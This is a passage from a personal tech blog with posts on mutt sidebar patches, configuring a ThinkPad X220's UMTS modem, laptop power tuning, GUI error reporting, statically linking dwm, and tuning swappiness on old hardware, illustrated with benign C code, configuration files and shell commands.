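/* Number of decimal digits of a non-negative integer, e.g. 0 -> 1,
 * 42 -> 2. Negative input is not handled here (the removed function
 * counted the '-' sign as an extra character). */
int decimal_width(int n)
{
    int width = 1;

    while (n >= 10) {
        n /= 10;
        width++;
    }
    return width;
}
```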

Now, customizing the sidebar format is simple, straight-forward and mutt-like:

sidebar_format

    Format string for the sidebar. The sequences `%N', `%F' and
    `%S' will be replaced by the number of new or flagged messages
    or the total size of the mailbox. `%B' will be replaced with
    the name of the mailbox. The `%!' sequence will be expanded to
    `!' if there is one flagged message; to `!!' if there are two
    flagged messages; and to `n!' for n flagged messages, n>2.
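The rule for the `%!' sequence is small enough to spell out. The following is an illustration of the documented behaviour, not the code from the patch; the function name is made up, and expanding to an empty string for zero flagged messages is an assumption, since the text above does not cover that case.

```c
#include <stdio.h>

/* Expand the `%!' sequence for `flagged` flagged messages into buf:
 * 1 -> "!", 2 -> "!!", n > 2 -> "n!". The empty string for zero
 * flagged messages is an assumption, see the text above. */
void expand_flagged(char *buf, size_t len, int flagged)
{
    if (flagged <= 0)
        snprintf(buf, len, "%s", "");
    else if (flagged == 1)
        snprintf(buf, len, "!");
    else if (flagged == 2)
        snprintf(buf, len, "!!");
    else
        snprintf(buf, len, "%d!", flagged);
}
```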

While investigating mutt's performance, one thing struck me: To decode a mail (eg. from Base64), mutt will create a temporary file and print the contents into it, later reading them back. This also happens for evaluating filters that determine coloring. For example,

color   index  black green  '~b Julius'

will highlight mail containing my name in the body in bright green (this is tremendously useful). However, for displaying a message in the index, it will be decoded to a temporary file and later read back. This is just insane, and clearly a sign that the mutt authors wouldn't bother with dynamic memory allocation.

By chance I found a glibc-only function, fmemopen(): "fmemopen, open_memstream, open_wmemstream - open memory as stream".

From the commit message:

When searching the header or body for strings and the
`thorough_search' option is set, a temp file was created, parsed,
and then unlinked again. This is now done in memory using glibc's
open_memstream() and fmemopen() if they are available.

This makes mutt respond much more rapidly.

0015-keep-buffer-like-temp-file-in-memory.patch
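To show what the two calls do, here is a minimal round trip that stands in for the "write to temp file, read it back" pattern. It is a sketch under the assumption that both functions are available, not an excerpt from the patch; memory_roundtrip is a made-up name.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>

/* Write `text` into an in-memory stream, then read its first line back
 * through a second in-memory stream. Returns 0 on success and stores
 * the line in out (at most outlen - 1 characters), -1 on error. */
int memory_roundtrip(const char *text, char *out, size_t outlen)
{
    char *mem = NULL;
    size_t memlen = 0;
    FILE *w, *r;
    int ret = -1;

    /* open_memstream() grows the buffer as needed, like a temp file */
    if ((w = open_memstream(&mem, &memlen)) == NULL)
        return -1;
    fputs(text, w);
    if (fclose(w) != 0) {   /* mem and memlen are up to date after fclose() */
        free(mem);
        return -1;
    }

    /* there is nothing to read back from an empty buffer */
    if (memlen > 0 && (r = fmemopen(mem, memlen, "r")) != NULL) {
        if (fgets(out, (int) outlen, r) != NULL)
            ret = 0;
        fclose(r);
    }
    free(mem);
    return ret;
}
```

Both streams are ordinary FILE pointers, which is why existing code that expects a temp file can keep using fputs(), fgets() and friends unchanged.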

Finally, there are some patches that fix various other issues, see commit message for details.

There you go. I appreciate any comments or further improvements.

Update 1: The original author contacted me. He told me he's written most of the code in a single sitting late at night. ;-)

Update 2: The 16th patch will make mutt crash when you compile it with -D_FORTIFY_SOURCE=2. There's a fix: 0020-use-PATH_MAX-instead-of-_POSIX_PATH_MAX-when-realpat.patch (thanks, Jakob!)

Update 3: Terry Chan contacted me. All my patches are now part of the Lunar Linux Sidebar Patch.

Update 4: The 15th patch that uses open_memstream uncovered a bug in glibc. See here and here.

posted 2012-01-08 ∴ tagged mutt, linux and c

X220's UMTS card

I've been toying around with the UMTS module in my X220 lately. I got a pre-paid SIM from blau.de, who offer 24h UMTS flatrates for 2,40 EUR. (This is probably my use case: Being somewhere without internet access for a day or two. This only happens so often, so I don't want a "real" flat.)

My UMTS card is manufactured by Sony Ericsson and connected via internal USB:

$ lsusb -v -s 004:003
    ...
    idVendor           0x0bdb Ericsson Business Mobile Networks BV
    idProduct          0x1911

The installation is easy: Just insert the SIM card behind the battery as shown here. Add yourself to the dialout group, log in again, and you're set.

You can first connect to your device using chat or picocom (which can be terminated via C-a C-x). To ask if you can use the SIM without PIN, send the AT+CPIN? command:

$ picocom /dev/ttyACM0
...
AT+CPIN?
+CPIN: READY

If you're not ready to go, I would disable the PIN request using a regular phone. (I did.)

Dialling out is easy. I set up two profiles in the /etc/wvdial.conf that allow me to switch between "pay per megabyte" and "dayflat":

[Dialer blau]
Modem = /dev/ttyACM0
Init1 = AT+CGDCONT=1,"IP","internet.eplus.de"
Stupid mode = 1
phone= *99#
Username = blau
Password = blau

[Dialer tagesflat]
Modem = /dev/ttyACM0
Init1 = AT+CGDCONT=1,"IP","tagesflat.eplus.de"
Stupid mode = 1
phone= *99#
Username = blau
Password = blau

The rest happens automatically, once you invoke wvdial blau or wvdial tagesflat. (Note you have to execute these with root privileges because they want to modify pppd-related config files.) Most probably you want the follow-up command route add default dev ppp0 to route all traffic via the ppp0 interface.

In a test run I got a downstream speed of 190KB/s (city perimeter). Working over SSH is not painful at all.

I also played around with gammu a little bit.

$ gammu --identify
Device               : /dev/ttyACM0
Manufacturer         : Lenovo
Model                : unknown (F5521gw)
Firmware             : R2A07

The Wammu interface is nice, it can even receive SMS. But sending SMSes failed so far:

$ echo "Das ist ein Test" | gammu --debug textall --debug-file /tmp/gammu \
    sendsms TEXT +491785542342
...
1 "AT+CMGS=28"
2 "> 079194710716000011000C919471584532240000FF10C4F01C949ED341E5B41B442DCFE9^Z"
3 "+CMS ERROR: 500"

... which is somewhat of a "generic error". Maybe sending SMS is not supported at all. I'll look into that later.

Also, I'll have a look at whether my card supports GPS information retrieval. ThinkWiki claims a similar model does this. Interesting.

Update: Actually, I forgot one thing. I keep the following two entries in my /etc/wvdial.conf:

[Dialer on]
Modem = /dev/ttyACM0
Init1 = AT+CFUN=1

[Dialer off]
Modem = /dev/ttyACM0
Init1 = AT+CFUN=4

The actual sequence is now: wvdial on && wvdial blau. The AT+CFUN=1 will activate the radio equipment, which is necessary. And, suddenly, also SMS delivery works! :-)

posted 2011-12-22 ∴ tagged x220, umts and linux

New X220

I got a brand new Thinkpad X220 on Thursday. I'm not much into hardware, I think it should mainly work. I have a model with 4 GB of RAM, an i7 at 2.7 GHz, UMTS preinstalled, an SSD instead of an HDD and an IPS panel. It's a really nifty thing.

Paying the extra money for the SSD is totally worth it. Everything happens instantaneously. The bootup process is down to five seconds. The IPS panel is really worth it, too. ThinkPads have long been criticized for their bad displays – with the new panel at full brightness, my regular screen looks really dim and grey...

The Debian netinstall works smoothly. I haven't come around to testing all the stuff like the DisplayPort connectors, Bluetooth, UMTS, USB 3.0. But the usual stuff works out of the box.

However, there are major problems with the power management of both the graphics card and the whole system, the latter one being a regression in the recent 3.0 and 3.1 kernel series regarding ASPM. Currently I'm using the 3.1.0-1-amd64 kernel with the pcie_aspm=force boot parameter. I cannot really see a difference in power consumption when varying this parameter, though.

A major thing, however, is re-enabling the RC6 mode of the graphics chip. This alone saves more than 4W when the computer is in an idle state. My /etc/modprobe.d/i915-kms.conf looks like this now:

options i915 modeset=1
options i915 i915_enable_rc6=1
options i915 i915_enable_fbc=1
options i915 lvds_downclock=1

Suspend/resume works fine, no flickering effects. I use the following command to find out the current power consumption:

while sleep 1; do
    awk '{printf"%.2f\n",$1/-1000}' < /sys/devices/platform/smapi/BAT0/power_now;
done

This requires the tp_smapi kernel module to be loaded. With full brightness (0) and while writing this blog article, the consumption is at ~12W; with medium brightness (8) it's ~8.5W; at the lowest brightness (15) it's ~8W; with the display completely turned off, it's ~6.5W. There are people who claim they only have a ~5.4W power consumption. If you have any other hints on this or if you own an X220 yourself, I'd be interested in the details.

posted 2011-12-10 ∴ tagged x220 and linux

GUI simplicity vs. UNIX simplicity

I ranted about the new Unity interface some weeks ago. On several occasions thereafter, I had to help people solve problems they had using some sort of graphical user interface.

Example I: I was debugging a broken VPN connection. The connection settings were managed by the KDE network manager, which is rather easy to use. Internally, of course, the network manager just writes out some temporary configuration files and starts the PPP daemon with a lot of custom flags. That's all fine if it works – but in this case it didn't work. It just said: "connection failed", no diagnostics given. (The solution was to enable MPPE, which itself was trivial: ticking the corresponding box. How did I find this out? Tailing /var/log/dmesg while connecting. It said right there: MPPE not enabled, but server side requires it.)
Example II: The gnome network manager somehow fucked up. Even now I don't know why. It says "connecting", and then nothing happens. No diagnostics.

UNIX is simple. It really is. There is a reasonable and easy-to-follow philosophy behind it. But UNIX requires the user to know what he wants to do, and read error messages. UNIX simplicity is not the same as iPhone simplicity.

Eric S. Raymond wrote this set of rules that should guide UNIX program design. In this context, two important rules stick out (emphasis mine):

Rule of Silence: When a program has nothing surprising to say, it should say nothing.

Rule of Repair: When you must fail, fail noisily and as soon as possible.

Although this is of course mostly aimed at text user interface programs, you can get an important point here. Most GUIs adhere to the Rule of Silence quite well – in fact so well that they seldom say anything at all!

Since many UNIX GUIs invoke text-interface programs under the hood, it should be a necessity to be able to view how those programs failed. Luckily, most TUI programs provide descriptive error messages. If they are hidden in the GUI there are two effects:

the "regular" user sees that something fails, and
the admin looking at the problem sees that something fails and pulls out his hair trying to find out what – so that he can repair it!

I don't use GUI programs at all, except for a browser (Vimperator/Firefox), a PDF viewer (Zathura) and The GIMP. Mostly, this is because of usability considerations. But also, I'm afraid to use a computer where I cannot see what is happening. And that's exactly the case with GUIs that do stuff that can fail: I don't know what they are doing and why they are failing!

In the end I always go the extra mile and read up on the PPP daemon, for example. This wouldn't be necessary if GUIs had a switch to do some really verbose logging. That would help tremendously. Plus a button to display that log. Should be easy, shouldn't it?
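
To illustrate how little it takes, here is a rough sketch in C of what such a front end could do: run the helper program, keep everything it prints (including stderr) and remember the exit status, so that a "show log" button has something to display. The function name run_and_log() is invented for this example, and a real network manager would of course start its helpers differently.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>

/* Run cmd through the shell, collect stdout and stderr in diag (at most
 * cap-1 bytes, NUL-terminated) and return the exit status, or -1 on error. */
int run_and_log(const char *cmd, char *diag, size_t cap)
{
    char full[1024], scratch[256];
    size_t used = 0, n;
    int len, status;

    if (cap == 0)
        return -1;
    diag[0] = '\0';

    /* Group the command so that "2>&1" applies to all of it. */
    len = snprintf(full, sizeof full, "{ %s\n} 2>&1", cmd);
    if (len < 0 || (size_t)len >= sizeof full)
        return -1;

    FILE *p = popen(full, "r");
    if (p == NULL)
        return -1;
    while (used < cap - 1 &&
           (n = fread(diag + used, 1, cap - 1 - used, p)) > 0)
        used += n;
    diag[used] = '\0';

    /* Discard what does not fit, so the child is not cut off mid-write. */
    while (fread(scratch, 1, sizeof scratch, p) > 0)
        ;

    status = pclose(p);
    if (status == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

A GUI would show "connection failed" as before, but could offer the contents of diag and the exit status on request instead of throwing them away.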

posted 2011-11-24 ∴ tagged unix and linux

dead code easter egg

I was just researching how the file format of the xt_recent module works. That's where I found this nice easter egg: instead of writing down the size of an IPv6 address plus one, they simply used a dummy string "+b335:1d35:1e55:dead:c0de:1715:5afe:c0de", reading "beesides less dead code it is safe code". Hehe.
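
The trick works because sizeof applied to a string literal yields its length including the terminating NUL byte. A small sketch of the principle (the macro and function names are made up here, this is not the kernel source):

```c
#include <stddef.h>

/* The dummy string quoted above: a leading '+' followed by a fully
 * written-out IPv6 address (8 groups of 4 hex digits, 7 colons). */
#define LONGEST_ENTRY "+b335:1d35:1e55:dead:c0de:1715:5afe:c0de"

/* sizeof on a string literal counts the terminating NUL as well:
 * 1 leading character + 39 address characters + 1 NUL = 41 bytes. */
size_t entry_buffer_size(void)
{
    return sizeof(LONGEST_ENTRY);
}
```

A buffer declared as char buf[sizeof(LONGEST_ENTRY)] is therefore exactly large enough for such an entry, without a magic number in the code.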

posted 2011-10-02 ∴ tagged linux

statically linking dwm against X11 and XCB

Today, virtually all binaries used on Linux systems are dynamically linked to several libraries. While it is commonly accepted that statically linking applications is bad – most notably in terms of security concerns: fixing a library's bug means you won't have to recompile all applications that are using that special library, they'll simply load the version available at run-time – there are in fact good reasons to use static linking. (And for those who claim statically linked binaries occupy much disk space: yeah, sure. As if a few megs compared to a few hundred kilobytes make that much of a difference today, plus you don't have the overhead of looking up and loading the libs in the first place.)

As I mentioned in my post about tmux already, there's a huge advantage to static linking: you can compile bleeding edge software with bleeding edge library functions and still use them on reasonably outdated systems (think: Debian stable).

One division of rapidly evolving software I could never successfully link statically was window managers like dwm or awesome. However, especially considering the XCB development and adoption over the past few years, to me it makes perfect sense. I'll just distribute a copy of the window manager I use to different systems and have a guarantee it'll work there, no matter the libxcb version (or if it's available at all).

Usually, however, it's not possible to just pass a -static or -Wl,-Bstatic flag to the compiler (in my case, gcc). It'll fail to find several symbols that are located in libraries that don't have to be explicitly linked in. Such an error message might look like this:

/usr/lib/libXinerama.a(Xinerama.o): In function `find_display':
(.text+0x89): undefined reference to `XextCreateExtension'
/usr/lib/libXinerama.a(Xinerama.o): In function `XineramaQueryScreens':
(.text+0x255): undefined reference to `XMissingExtension'

To find the appropriate library, you may try to use pkg-config. I use a different approach, however. I have a shell function defined called findsym (beware, Z-Shell specialties apply):

findsym () {
  [[ -z $1 ]] && return 1
  SYMBOL=$1
  LIBDIR=${2:-/usr/lib}
  for lib in $LIBDIR/*.a
  do
    nm $lib 2> /dev/null | grep -q $SYMBOL && \
      print "symbol found in $lib\n -L$LIBDIR -l${${lib:t:r}#lib}"
  done
}

Thus, I can simply go looking for the missing XMissingExtension symbol like this:

$ findsym XMissingExtension
symbol found in /usr/lib/libXext.a
 -L/usr/lib -lXext
symbol found in /usr/lib/libXi.a
 -L/usr/lib -lXi
symbol found in /usr/lib/libXinerama.a
 -L/usr/lib -lXinerama
symbol found in /usr/lib/libXrandr.a
 -L/usr/lib -lXrandr

Now, I use the readme file, some common sense or simple trial and error to find out which library I'd best link in, too. In this case, it's adding a simple -lXext to the LDFLAGS part.

Thus, I come up with the following diff to dwm's config.mk:

--- a/config.mk
+++ b/config.mk
@@ -16,7 +16,7 @@ XINERAMAFLAGS = -DXINERAMA

 # includes and libs
 INCS = -I. -I/usr/include -I${X11INC}
-LIBS = -L/usr/lib -lc -L${X11LIB} -lX11 ${XINERAMALIBS}
+LIBS = -L/usr/lib -L${X11LIB} -static -lX11 ${XINERAMALIBS} -lxcb -lXau -lXext -lXdmcp -lpthread -ldl

 # flags
 CPPFLAGS = -DVERSION=\"${VERSION}\" ${XINERAMAFLAGS}

There's one important point here: libX11 will (to me, it seems, inevitably) load another library, not sure why or which one. Thus, it is vitally important to statically link in libdl, the library that dynamically loads another library. Otherwise, the following error messages appear:

/usr/lib/libX11.a(CrGlCur.o): In function `open_library':
(.text+0x3b): undefined reference to `dlopen'
/usr/lib/libX11.a(CrGlCur.o): In function `fetch_symbol':
(.text+0x6b): undefined reference to `dlsym'
/usr/lib/libX11.a(CrGlCur.o): In function `fetch_symbol':
(.text+0x88): undefined reference to `dlsym'

With the above modification to config.mk, dwm will compile and link just fine:

$ file dwm
dwm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, for GNU/Linux 2.6.18, not stripped

You can reduce the binary's size by a few hundred kilobytes by manually calling strip(1).

The binary works very well for me. I'll try to use it on different systems over the next few weeks and see what happens. If that works out well, I'll also try to get lucky with awesome and zathura, as these (and the libraries needed) are not installed on many systems, either.

posted 2011-08-05 ∴ tagged dwm, linux and static-linking

Tuning old hardware with slow hard drive

My main work machine is a pretty old X41 with a 40GB hard disk and 512MB of RAM. It is more than five years old and is not without problems. (In recent months, I have to try several times before switching it on successfully – in most cases, it just beeps twice and displays "Keyboard error, <F1> to configure" and the keyboard doesn't work.)

However, there's a thing which annoys me a lot: bad performance. I use a resource-friendly window manager with some urxvts running. Apart from the memory-hog Firefox, I very seldom use any graphical application (ie. any program using the GTK or Qt libraries).

For some weeks now I've been trying this cgroups hack, with mixed results. In some cases, the performance is better, sometimes it's not.

How bad could the overall performance be, then? – Unfortunately, very bad. Which has, in part, to do with my slow hard disk. It does uncached reading at 18MB/s in theory:

$ sudo hdparm -t /dev/sda
/dev/sda:
 Timing buffered disk reads:   56 MB in  3.08 seconds =  18.21 MB/sec

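In reality, it's rather some 16.5MB/s: reading back the 268MB file written by dd takes 16.2 seconds (the 26.8MB/s that dd reports is for writing it):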

$ dd if=/dev/zero of=./zero bs=1048576 count=256
256+0 records in
256+0 records out
268435456 bytes (268 MB) copied, 10.0246 s, 26.8 MB/s

$ time cat zero > /dev/null
cat zero > /dev/null  0.01s user 0.25s system 1% cpu 16.246 total

Now, I have to live with this (SSDs are still very expensive!). The main problem here is that the kernel swaps out data that wasn't accessed for a while (although, from a naïve perspective, there's no ultimate need to do so since there's still free memory left).

I actually notice that with two programs regularly:

When I haven't taken a look at Firefox for a few minutes, it might take up to 10(!) seconds to redraw the window.
When I haven't opened a urxvt for some time, opening a new one might take up to 5 seconds; initializing the shell another two.

Now I always thought this was the Linux Kernel being stupid. However I discovered a switch today. From the sysctl.vm documentation:

swappiness

This control is used to define how aggressive the kernel will swap
memory pages.  Higher values will increase agressiveness, lower values
decrease the amount of swap.

The default value is 60.

Debian (like all other distros) seems to keep this default value. After reading up on some articles I set vm.swappiness=0 in /etc/sysctl.conf. (You can do this interactively with sysctl -w vm.swappiness=0 also. Interestingly, Ubuntu recommends a value of 10 for desktop systems.)
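
The value that is currently in effect can also be read from within a program, since the sysctl is exposed as a file under /proc. A minimal sketch in C (the function names are made up for this example; it only reads the value and changes nothing):

```c
#include <stdio.h>

/* Parse one integer from an already opened tunable file; -1 on failure. */
int parse_tunable(FILE *f)
{
    int value;
    return fscanf(f, "%d", &value) == 1 ? value : -1;
}

/* Current vm.swappiness, or -1 if the /proc file is not available. */
int current_swappiness(void)
{
    FILE *f = fopen("/proc/sys/vm/swappiness", "r");
    if (f == NULL)
        return -1;
    int value = parse_tunable(f);
    fclose(f);
    return value;
}
```

On a system with the default setting, current_swappiness() would be expected to return 60.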

For the past day or so, I have been monitoring the output of vmstat 1 every now and then (especially the swap in/out parameters si and so). But even after the first hour one thing is evident: the interactive system performance is much, much better. It feels like a machine upgrade.

Terminals open instantly (because the initialization parts of their binaries don't get swapped out, for example). Switching to Firefox is instant. Switching tabs is fast. The system feels a lot more responsive.

Where's the drawback, then? If you could magically tune your system's performance, why wouldn't you want to do that?

A case where this setup will give you a headache is when you actually do run out of memory. I easily accomplished that by opening Gimp on a huge (blank) file. Now, working with Gimp is easy; switching to Firefox takes ages (heavy swapping). So there a not-so-aggressive swapping policy would be better if you switch between several memory-hogging applications a lot.

(Side note: When there's a lot of free memory left – for example after closing Gimp – the kernel step by step swaps in certain blocks again, a few every second so as to not disturb system performance. I saw this going on for several minutes on an otherwise completely idle system.)

Conclusion: For the usage pattern I'm accustomed to, setting vm.swappiness=0 actually is a huge performance improvement. But your mileage may vary.

posted 2011-01-05 ∴ tagged x41, linux and performance
